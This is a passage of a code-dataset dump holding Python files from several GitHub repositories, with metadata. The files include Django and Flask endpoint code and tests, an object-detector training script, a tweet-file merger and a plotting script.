"code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 18, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 18, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 18, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "28693741799", "text": "\"\"\"Test for email util module.\"\"\"\n\nimport time\nfrom builtins import str\n\nfrom django.test import TestCase\n\nfrom pykeg.core import models\nfrom pykeg.util import email\n\n\nclass EmailUtilTests(TestCase):\n def setUp(self):\n self.user = models.User.objects.create(\n username=\"email-test\", email=\"email-test@example.com\"\n )\n\n def tearDown(self):\n self.user.delete()\n\n def test_build_email_change_token(self):\n token = email.build_email_change_token(self.user, \"new-address@example.com\")\n uid, new_address = email.verify_email_change_token(self.user, token)\n self.assertEqual(self.user.id, uid)\n self.assertEqual(\"new-address@example.com\", new_address)\n\n def test_expiration(self):\n token = email.build_email_change_token(self.user, \"new-address@example.com\")\n time.sleep(1.1)\n try:\n email.verify_email_change_token(self.user, token, max_age=1)\n self.fail(\"Should have thrown exception\")\n except ValueError as e:\n self.assertTrue(\"Signature age\" in str(e))\n", "repo_name": "Kegbot/kegbot-server", "sub_path": "pykeg/util/email_test.py", "file_name": "email_test.py", "file_ext": "py", "file_size_in_byte": 1082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 191, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "pykeg.core.models.User.objects.create", "line_number": 14, "usage_type": "call"}, {"api_name": "pykeg.core.models.User", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pykeg.core.models", "line_number": 14, "usage_type": "name"}, {"api_name": "pykeg.util.email.build_email_change_token", "line_number": 22, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 22, "usage_type": "name"}, {"api_name": "pykeg.util.email.verify_email_change_token", "line_number": 23, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 23, "usage_type": "name"}, {"api_name": "pykeg.util.email.build_email_change_token", "line_number": 28, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "pykeg.util.email.verify_email_change_token", "line_number": 31, "usage_type": "call"}, {"api_name": "pykeg.util.email", "line_number": 31, "usage_type": "name"}, {"api_name": "builtins.str", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "7082399978", "text": "import requests\n\nUSERNAME = 'Fionn'\nAPI_KEY = ''\nBASE_URL = 'https://api.sketchengine.eu/bonito/run.cgi'\n\ndef get_sketch():\n\tdata = {\n\t\t'format': 'json',\n\t\t'lemma': 'book',\n\t\t'lpos': '-v'\n\t}\n\tres = requests.get(BASE_URL + '/wsketch?corpname=preloaded/bnc2', params=data, auth=(USERNAME, 
API_KEY)).json()\n\tprint(res)\n\tprint('There are %d grammar relations for %s%s (lemma + POS) in corpus %s.' %\n\t\t(len(res['Gramrels']), data['lemma'], data['lpos'], 'preloaded/bnc2'))\n\nif __name__ == '__main__':\n\tget_sketch()", "repo_name": "FionnCasey/SEO-Auto-audit", "sub_path": "sketchengine.py", "file_name": "sketchengine.py", "file_ext": "py", "file_size_in_byte": 509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "38773545531", "text": "from tsdesktop.testing import TSDesktopTest\nfrom .dockman import view\nfrom tsdesktop import dockman\nfrom bottle import HTTPResponse, HTTPError\n\nimages = [{}]\ncontainers = [{'Status': None}]\n\nclass Views(TSDesktopTest):\n    cli = None\n\n    def setUp(self):\n        self.cli = dockman._mockClient()\n\n    def test_dockman(self):\n        r = view()\n        self.assertLinesContains(r,\n            '
    ')\n\n def test_dockmanActionInvalid(self):\n r = view('mysqld', 'invalid')\n self.assertResponse(r, 400)\n\n def test_dockmanPingFail(self):\n self.cli.pingFail = True\n with self.assertRaises(HTTPError) as cm:\n r = view()\n self.assertResponseError(cm.exception)\n\n def test_pullImage(self):\n with self.assertRaises(HTTPResponse) as cm:\n view('mysqld', 'pull-image')\n self.assertRedirect(cm.exception, location='/dockman')\n\n def test_pullImageInvalid(self):\n r = view('faked', 'pull-image')\n self.assertResponse(r, 400)\n\n def test_pullImageError(self):\n self.cli.mock(images, '{\"error\": \"fake error\"}')\n r = view('mysqld', 'pull-image')\n self.assertResponseError(r)\n\n def test_serviceStart(self):\n self.cli.mock([{'Status': ''}])\n with self.assertRaises(HTTPResponse) as cm:\n view('mysqld', 'start')\n self.assertRedirect(cm.exception, location='/dockman')\n\n def test_serviceStartError(self):\n self.cli.mock(containers)\n self.cli.mock('{\"error\": \"service start fake error\"}')\n r = view('mysqld', 'start')\n self.assertResponse(r, 400)\n\n def test_serviceStop(self):\n self.cli.mock([{\n 'Status': 'Up since...',\n 'Names': ['/tsdesktop-mysqld'],\n }])\n with self.assertRaises(HTTPResponse) as cm:\n r = view('mysqld', 'stop')\n self.assertRedirect(cm.exception, location='/dockman')\n\n def test_serviceStopError(self):\n self.cli.mock(containers)\n self.cli.mock('{\"error\": \"service stop fake error\"}')\n r = view('mysqld', 'stop')\n self.assertResponse(r, 400)\n", "repo_name": "tsadm/desktop", "sub_path": "lib/tsdesktop/bottman/views/dockman_test.py", "file_name": "dockman_test.py", "file_ext": "py", "file_size_in_byte": 2158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tsdesktop.testing.TSDesktopTest", "line_number": 9, "usage_type": "name"}, {"api_name": "tsdesktop.dockman._mockClient", "line_number": 13, "usage_type": "call"}, {"api_name": "tsdesktop.dockman", "line_number": 13, "usage_type": "name"}, {"api_name": "dockman.view", "line_number": 16, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 21, "usage_type": "call"}, {"api_name": "bottle.HTTPError", "line_number": 26, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 27, "usage_type": "call"}, {"api_name": "bottle.HTTPResponse", "line_number": 31, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 32, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 36, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 41, "usage_type": "call"}, {"api_name": "bottle.HTTPResponse", "line_number": 46, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 47, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 53, "usage_type": "call"}, {"api_name": "bottle.HTTPResponse", "line_number": 61, "usage_type": "argument"}, {"api_name": "dockman.view", "line_number": 62, "usage_type": "call"}, {"api_name": "dockman.view", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "11287279034", "text": "from functools import partial\nimport json\nimport os\nimport random\nfrom pathlib import Path\nfrom random import shuffle\nimport contextlib\n\nimport imgaug.augmenters as iaa\nimport cv2\nimport mlflow\nimport numpy as np\nfrom torch import nn\nimport torch\nfrom torch.optim.lr_scheduler import CosineAnnealingLR\nfrom torchvision.models.detection.backbone_utils import _validate_trainable_layers\nfrom 
torchvision.models.detection.ssd import SSD\nfrom torchvision.models.mobilenetv3 import MobileNet_V3_Large_Weights, mobilenet_v3_large\nfrom torchvision.models.detection import _utils as det_utils\nfrom torchvision.models.detection.anchor_utils import DefaultBoxGenerator\nimport arrow\nfrom torch.utils.data import DataLoader, Dataset\nfrom ranger21 import Ranger21\nfrom tqdm import tqdm\nfrom torchvision.models.detection.ssdlite import SSDLiteHead, _normal_init, SSDLite320_MobileNet_V3_Large_Weights, _mobilenet_extractor\nfrom torchmetrics.detection.mean_ap import MeanAveragePrecision\n\n\nclass CircularDataset(Dataset):\n def __init__(self, samples, img_shape, aug=None):\n data = []\n self._aug = aug\n self._img_shape = img_shape\n for sample in samples:\n json_path = f'{sample[:-3]}json'\n with open(json_path) as f:\n label = json.load(f)['shapes']\n data.append((sample, label))\n self._samples = data\n\n def __len__(self):\n return len(self._samples)\n\n def __getitem__(self, item):\n img_path, label = self._samples[item]\n img = cv2.imread(img_path)\n with contextlib.suppress(TypeError):\n img = self._aug(image=img)\n zeros = np.zeros(self._img_shape + (3,))\n if self._aug:\n left = random.randint(0, self._img_shape[1] - img.shape[1])\n top = random.randint(0, self._img_shape[0] - img.shape[0])\n else:\n left = 0\n top = 0\n zeros[top:top + img.shape[0], left:left + img.shape[1]] = img\n boxes = [\n np.array(\n [\n shape['points'][0][0] + left,\n shape['points'][0][1] + top,\n shape['points'][1][0] + left,\n shape['points'][1][1] + top,\n ]\n )\n for shape in label\n ]\n boxes = np.array(boxes)\n return zeros.transpose((2, 0, 1)), boxes, np.ones((boxes.shape[0],))\n\ndef create_model(size, detections_per_img, topk_candidates, positive_fraction):\n weights = SSDLite320_MobileNet_V3_Large_Weights.verify(SSDLite320_MobileNet_V3_Large_Weights.DEFAULT)\n weights_backbone = MobileNet_V3_Large_Weights.verify(MobileNet_V3_Large_Weights.DEFAULT)\n\n trainable_backbone_layers = _validate_trainable_layers(\n weights is not None or weights_backbone is not None, None, 6, 6\n )\n\n # Enable reduced tail if no pretrained backbone is selected. 
See Table 6 of MobileNetV3 paper.\n reduce_tail = weights_backbone is None\n\n norm_layer = partial(nn.BatchNorm2d, eps=0.001, momentum=0.03)\n\n backbone = mobilenet_v3_large(\n weights=weights_backbone, progress=True, norm_layer=norm_layer, reduced_tail=reduce_tail\n )\n if weights_backbone is None:\n # Change the default initialization scheme if not pretrained\n _normal_init(backbone)\n backbone = _mobilenet_extractor(\n backbone,\n trainable_backbone_layers,\n norm_layer,\n )\n\n anchor_generator = DefaultBoxGenerator([[2, 3] for _ in range(6)], min_ratio=0.2, max_ratio=0.95)\n out_channels = det_utils.retrieve_out_channels(backbone, size)\n num_anchors = anchor_generator.num_anchors_per_location()\n if len(out_channels) != len(anchor_generator.aspect_ratios):\n raise ValueError(\n f\"The length of the output channels from the backbone {len(out_channels)} do not match the length of the anchor generator aspect ratios {len(anchor_generator.aspect_ratios)}\"\n )\n\n defaults = {\n \"score_thresh\": 0.001,\n \"nms_thresh\": 0.9,\n \"detections_per_img\": detections_per_img,\n \"topk_candidates\": topk_candidates,\n \"positive_fraction\": positive_fraction,\n # Rescale the input in a way compatible to the backbone:\n # The following mean/std rescale the data from [0, 1] to [-1, 1]\n \"image_mean\": [0.5, 0.5, 0.5],\n \"image_std\": [0.5, 0.5, 0.5],\n }\n return SSD(\n backbone,\n anchor_generator,\n size,\n 2,\n head=SSDLiteHead(out_channels, num_anchors, 2, norm_layer),\n **defaults,\n )\n\n\ndef main():\n os.makedirs(weight_dir, exist_ok=True)\n model = create_model(img_shape[::-1], detections_per_img, topk_candidates, positive_fraction).to(torch.float32).cuda()\n samples = [str(sample) for sample in Path(data_dir).glob('*.jpg')]\n train_count = round(0.8 * len(samples))\n shuffle(samples)\n train = samples[:train_count]\n val = samples[train_count:]\n train_loader = DataLoader(CircularDataset(\n train, img_shape, aug), batch_size=batch_size, shuffle=True)\n val_loader = DataLoader(CircularDataset(val, img_shape), batch_size=batch_size)\n\n opt = Ranger21(model.parameters(), lr=lr, num_epochs=epochs, num_batches_per_epoch=len(train_loader),\n warmdown_active=False, use_warmup=False)\n scheduler = CosineAnnealingLR(opt, T_max=epochs)\n run_name = f\"{arrow.now().format('MMDD_HHmm')}\"\n weight_path = f'{weight_dir}/{run_name}.pth'\n mlflow.start_run(run_name=run_name)\n mlflow.log_params({\n 'lr': lr,\n 'batch_size': batch_size,\n 'topk_candidates': topk_candidates,\n 'detections_per_img': detections_per_img,\n 'positive_fraction': positive_fraction,\n })\n model.train()\n best_map = 0\n for epoch_i in tqdm(range(epochs)):\n losses = []\n for batch_x, boxes, labels in train_loader:\n targets = [\n {\n 'boxes': boxes[i].to(torch.long).cuda(),\n 'labels': labels[i].to(torch.long).cuda(),\n }\n for i in range(boxes.shape[0])\n ]\n opt.zero_grad(set_to_none=True)\n y_pred = model(batch_x.to(torch.float32).cuda(), targets)\n loss = y_pred['bbox_regression'] + y_pred['classification']\n loss.backward()\n opt.step()\n losses.append(loss.cpu().detach().numpy())\n scheduler.step()\n\n mlflow.log_metric('train_loss', np.mean(losses), epoch_i)\n if (epoch_i + 1) % eval_interval == 0:\n model.eval()\n val_map = MeanAveragePrecision()\n for batch_x, boxes, labels in val_loader:\n targets = [\n {\n 'boxes': boxes[i].to(torch.long).cuda(),\n 'labels': labels[i].to(torch.long).cuda(),\n }\n for i in range(boxes.shape[0])\n ]\n with torch.no_grad():\n y_pred = model(batch_x.cuda().to(torch.float32))\n 
val_map.update(y_pred, targets)\n val_map = val_map.compute()\n model.train()\n map_75 = val_map['map_75'].item()\n if map_75 > best_map:\n best_map = map_75\n torch.save(model.state_dict(), f'{weight_path[:-3]}best_map.pth')\n\n mlflow.log_metrics({\n 'map': val_map['map'].item(),\n 'map_50': val_map['map_50'].item(),\n 'map_75': map_75,\n }, epoch_i)\n\n\nif __name__ == '__main__':\n lr = 0.005\n positive_fraction = 0.7\n topk_candidates = 10\n detections_per_img = 2\n aug = iaa.Sequential([\n iaa.AdditiveGaussianNoise(scale=(0, 0.2*255)),\n iaa.Multiply((0.8, 1.2)),\n iaa.MultiplyHueAndSaturation((0.8, 1.2), per_channel=True),\n iaa.Cutout(nb_iterations=(1, 4), size=0.1, squared=False),\n ])\n epochs = 500\n eval_interval = 10\n batch_size = 32\n img_shape = (166, 762)\n weight_dir = 'weight/detector'\n data_dir = 'data/test_data/test_images'\n main()\n", "repo_name": "hoangphucITJP/eklipse", "sub_path": "train_detector.py", "file_name": "train_detector.py", "file_ext": "py", "file_size_in_byte": 8119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 29, "usage_type": "name"}, {"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 46, "usage_type": "call"}, {"api_name": "contextlib.suppress", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 51, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 69, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLite320_MobileNet_V3_Large_Weights.verify", "line_number": 72, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLite320_MobileNet_V3_Large_Weights", "line_number": 72, "usage_type": "name"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLite320_MobileNet_V3_Large_Weights.DEFAULT", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torchvision.models.mobilenetv3.MobileNet_V3_Large_Weights.verify", "line_number": 73, "usage_type": "call"}, {"api_name": "torchvision.models.mobilenetv3.MobileNet_V3_Large_Weights", "line_number": 73, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenetv3.MobileNet_V3_Large_Weights.DEFAULT", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torchvision.models.detection.backbone_utils._validate_trainable_layers", "line_number": 75, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenetv3.mobilenet_v3_large", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite._normal_init", "line_number": 89, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite._mobilenet_extractor", "line_number": 90, "usage_type": "call"}, {"api_name": "torchvision.models.detection.anchor_utils.DefaultBoxGenerator", "line_number": 96, "usage_type": "call"}, {"api_name": "torchvision.models.detection._utils.retrieve_out_channels", "line_number": 97, 
"usage_type": "call"}, {"api_name": "torchvision.models.detection._utils", "line_number": 97, "usage_type": "name"}, {"api_name": "torchvision.models.detection.ssd.SSD", "line_number": 115, "usage_type": "call"}, {"api_name": "torchvision.models.detection.ssdlite.SSDLiteHead", "line_number": 120, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 128, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 135, "usage_type": "call"}, {"api_name": "ranger21.Ranger21", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.CosineAnnealingLR", "line_number": 139, "usage_type": "call"}, {"api_name": "arrow.now", "line_number": 140, "usage_type": "call"}, {"api_name": "mlflow.start_run", "line_number": 142, "usage_type": "call"}, {"api_name": "mlflow.log_params", "line_number": 143, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.long", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 163, "usage_type": "attribute"}, {"api_name": "mlflow.log_metric", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 170, "usage_type": "call"}, {"api_name": "torchmetrics.detection.mean_ap.MeanAveragePrecision", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 177, "usage_type": "attribute"}, {"api_name": "torch.long", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 183, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 190, "usage_type": "call"}, {"api_name": "mlflow.log_metrics", "line_number": 192, "usage_type": "call"}, {"api_name": "imgaug.augmenters.Sequential", "line_number": 204, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 204, "usage_type": "name"}, {"api_name": "imgaug.augmenters.AdditiveGaussianNoise", "line_number": 205, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 205, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Multiply", "line_number": 206, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 206, "usage_type": "name"}, {"api_name": "imgaug.augmenters.MultiplyHueAndSaturation", "line_number": 207, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 207, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Cutout", "line_number": 208, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 208, "usage_type": "name"}]} +{"seq_id": "8359396784", "text": "from typing import Dict, Final, FrozenSet\n\nfrom database import db\nfrom flask import Blueprint, g, request\nfrom mysql.connector.optionfiles import re\nfrom supertokens_python.recipe.session import SessionContainer\nfrom supertokens_python.recipe.session.framework.flask import verify_session\n\nblueprint: Blueprint = Blueprint(\"update_enrollment\", __name__)\n\nCOURSE_COLS: Final[FrozenSet[str]] = frozenset(\n {\n \"course_id\",\n \"cat_id\",\n \"term\",\n \"year\",\n 
\"grade\",\n }\n)\n\n_GRADE: Dict[str, float] = {\n \"A\": 4.0,\n \"B+\": 3.5,\n \"B\": 3.0,\n \"C+\": 2.5,\n \"C\": 2.0,\n \"D+\": 1.5,\n \"D\": 1.0,\n \"F\": 0.0,\n}\n\n\n@blueprint.route(\"/update_enrollment\", methods=[\"GET\", \"POST\"])\n@verify_session()\ndef update_enrollment() -> dict:\n \"\"\"\n API spec for `/student/update_enrollment`\n\n ```js\n {\n \"course_id\": int,\n \"cat_id\": int,\n \"term\": int,\n \"year\": int,\n \"grade\": \"A\" | \"B+\" | \"B\" | \"C+\" | \"C\" | \"D+\" | \"D\" | \"F\"\n }\n ```\n \"\"\"\n session: SessionContainer = g.supertokens\n user_id = session.get_user_id()\n cursor = db.cursor()\n\n query = \"SELECT student_id FROM student WHERE user_id = %s\"\n cursor.execute(query, [user_id])\n stu_id = cursor.fetchall()[0][0]\n\n if request.method == \"POST\":\n # remove existing data\n data = request.get_json()\n\n if data is None:\n return {\"status\": \"failed\", \"msg\": \"data cannot be null\"}\n\n if stu_id is None or not re.fullmatch(\"^[0-9]{9}$\", str(stu_id)):\n return {\n \"status\": \"failed\",\n \"msg\": \"Cannot recognize the current student number.\",\n }\n\n query = \"DELETE FROM enrollment WHERE student_id = %s\"\n cursor.execute(query, [stu_id])\n\n # add a new data\n if len(data) == 0:\n return {\n \"status\": \"success\",\n \"msg\": \"OK; no student enrollments of \"\n + stu_id\n + \" are in the database now.\",\n }\n\n query = (\n \"INSERT INTO enrollment (student_id, course_id, category_id, term, year, grade, grade_no) VALUES \"\n + \", \".join([\"(%s, %s, %s, %s, %s, %s, %s)\"] * len(data))\n )\n records = []\n\n for record in data:\n records.extend(\n (\n stu_id,\n record[\"course_id\"],\n record[\"cat_id\"],\n record[\"term\"],\n record[\"year\"],\n record[\"grade\"],\n _GRADE[record[\"grade\"]],\n )\n )\n\n cursor.execute(query, records)\n db.commit()\n\n return {\n \"status\": \"success\",\n \"msg\": \"OK\",\n }\n\n query = \"SELECT * FROM enrollment WHERE student_id = %s\"\n cursor.execute(query, [stu_id])\n cols = [i[0] for i in cursor.description]\n result = cursor.fetchall()\n\n return {\n \"status\": \"success\",\n \"msg\": \"OK\",\n \"data\": [\n {col: row[i] for i, col in enumerate(cols)} for row in result\n ],\n }\n", "repo_name": "Touutae-lab/FastGraduation-API", "sub_path": "fastgrad_api/student/update_enrollment.py", "file_name": "update_enrollment.py", "file_ext": "py", "file_size_in_byte": 3128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Blueprint", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Final", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.FrozenSet", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 21, "usage_type": "name"}, {"api_name": "supertokens_python.recipe.session.SessionContainer", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.g.supertokens", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 49, "usage_type": "name"}, {"api_name": "database.db.cursor", "line_number": 51, "usage_type": "call"}, {"api_name": "database.db", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": 
"mysql.connector.optionfiles.re.fullmatch", "line_number": 64, "usage_type": "call"}, {"api_name": "mysql.connector.optionfiles.re", "line_number": 64, "usage_type": "name"}, {"api_name": "database.db.commit", "line_number": 102, "usage_type": "call"}, {"api_name": "database.db", "line_number": 102, "usage_type": "name"}, {"api_name": "supertokens_python.recipe.session.framework.flask.verify_session", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "39203932081", "text": "#!/usr/bin/python3\n\nimport os\nimport glob\nimport time\nimport math\n\nimport pandas as pd\n\nfrom tqdm import tqdm\n\nTWEETS_DIR_JSON_PATH = '/Users/shlomi/Dropbox/Apps/file-saver'\nTWEETS_JSON_PATHS = glob.glob(os.path.join(TWEETS_DIR_JSON_PATH, '*-*-*.json'))\nTWEETS_JSON_PATHS.sort()\n\nN_JSONS_IN_CSV = 100\n\nN_JSONS_BLOCKS = int(math.ceil(len(TWEETS_JSON_PATHS)/N_JSONS_IN_CSV))\n\ndef main():\n timestamp = int(time.time())\n \n \n for i in tqdm(range(N_JSONS_BLOCKS)):\n tweets_jsons_paths_block = TWEETS_JSON_PATHS[i*N_JSONS_IN_CSV:(i+1)*N_JSONS_IN_CSV]\n \n unified_csv_path = os.path.join(\n TWEETS_DIR_JSON_PATH, 'tweets-{}-{}.csv'.format(timestamp, i))\n\n with open(unified_csv_path, 'w') as unified_file:\n unified_df = pd.concat(\n (pd.read_json(path) for path in tqdm(tweets_jsons_paths_block))\n )\n unified_df.to_csv(unified_file)\n\n \"\"\"\n header = True\n for tweets_json_path in tqdm(tweets_jsons_paths_block):\n single_tweets_df = pd.read_json(tweets_json_path)\n single_tweets_df.to_csv(unified_file, mode='a', header=header)\n header = False\n \"\"\"\n \nif __name__ == '__main__':\n main()", "repo_name": "kstrauch94/Crime-Prediction-with-Tweets", "sub_path": "backup/prepare_tweets_json.py", "file_name": "prepare_tweets_json.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "glob.glob", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 32, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "73512961444", "text": "import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# чтение данных из файлов\ndata_file = 'dat/train.dat'\nclass_file = 'dat/classes.dat'\n\nwith open(data_file, 'r') as f:\n lines = f.readlines()\n data = []\n for line in lines:\n parts = line.strip().split()\n if len(parts) < 4:\n continue\n x, y, z = float(parts[0]), float(parts[1]), int(parts[-1])\n data.append((x, y, z))\n\nwith open(class_file, 'r') as f:\n lines = f.readlines()\n centers = {}\n for line in lines:\n parts = line.strip().split()\n if len(parts) < 4:\n continue\n center_x, center_y, center_z = float(parts[0]), float(parts[1]), int(parts[-1])\n centers[center_z] = (center_x, center_y)\n\n# разбивка данных на списки координат и меток классов\nxs = [d[0] for d in data]\nys = [d[1] for d in data]\nzs = [d[2] for d in data]\n\n# 
создание трехмерной фигуры\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# отображение точек данных\nax.scatter(xs, ys, zs, c=zs, marker='o')\n\n# отображение центров классов\nfor c in centers.keys():\n center_x, center_y = centers[c]\n ax.scatter(center_x, center_y, c, c='r', marker='x', s=300)\n\n# настройка осей и меток\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Class')\n\n# отображение графика\nplt.show()\n", "repo_name": "TheAntag0nist/AI_Labs", "sub_path": "bin/data_lab_1/graphic.py", "file_name": "graphic.py", "file_ext": "py", "file_size_in_byte": 1514, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "13801864136", "text": "from django.shortcuts import render, get_object_or_404, HttpResponse\r\nfrom django.http import JsonResponse\r\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\r\nfrom .models import Blog\r\n\r\n# Home View\r\ndef home(request):\r\n data = {\"Endpoints\": \"Below are the Endpoints for the usage of this API\", \r\n \"/getAll\": \"Returns all the Existing Objects from the Database\",\r\n \"/get/id\": \"Returns Specific Object based on the Id\", \r\n \"/drop/id\": \"Drops/Deletes Specific object from the Database\",\r\n \"/update\": \"Updates the Existing Post from the Database\",\r\n \"/insert\": \"Takes a POST request and inserts data into the Database\",\r\n \"/search?query=\": \"Returns Blogs based on the Searh Query\"}\r\n return JsonResponse(data)\r\n\r\n# Get All Objects from the Database\r\ndef getAll(request):\r\n all_blogs = Blog.objects.all()\r\n data = {\"results\": list(all_blogs.values(\"id\", \"author\", \"title\", \"content\", \"tags\"))}\r\n print(data)\r\n return JsonResponse(data)\r\n\r\n# Get Specific Objects from the Database\r\ndef get(request, id):\r\n blog = get_object_or_404(Blog, id=id)\r\n data = {\"results\": {\r\n \"id\": blog.id,\r\n \"author\": blog.author,\r\n \"title\": blog.title,\r\n \"content\": blog.content,\r\n }}\r\n return JsonResponse(data)\r\n \r\n# Insert / PUT data into the Database\r\n@csrf_exempt\r\ndef insert(request):\r\n if request.method == \"POST\":\r\n title = request.POST['title']\r\n author = request.POST['author']\r\n content = request.POST['content']\r\n if len(title) > 5 and len(author) > 2 and len(content) >3:\r\n blog = Blog(title=title, author=author, content=content)\r\n blog.save()\r\n return JsonResponse({\"Success\": \"Blog has been Added Successfully got the Data\"})\r\n else:\r\n return JsonResponse({\"Invalid Length\": \"Length of all the Fields must be greater than 5\"})\r\n \r\n else:\r\n return JsonResponse({\"Invalid Request Type\": \"Request Type POST Expected.\"})\r\n \r\n# Delete / Drop Specific Data\r\ndef drop(request, id):\r\n blog = get_object_or_404(Blog, id=id)\r\n if blog:\r\n 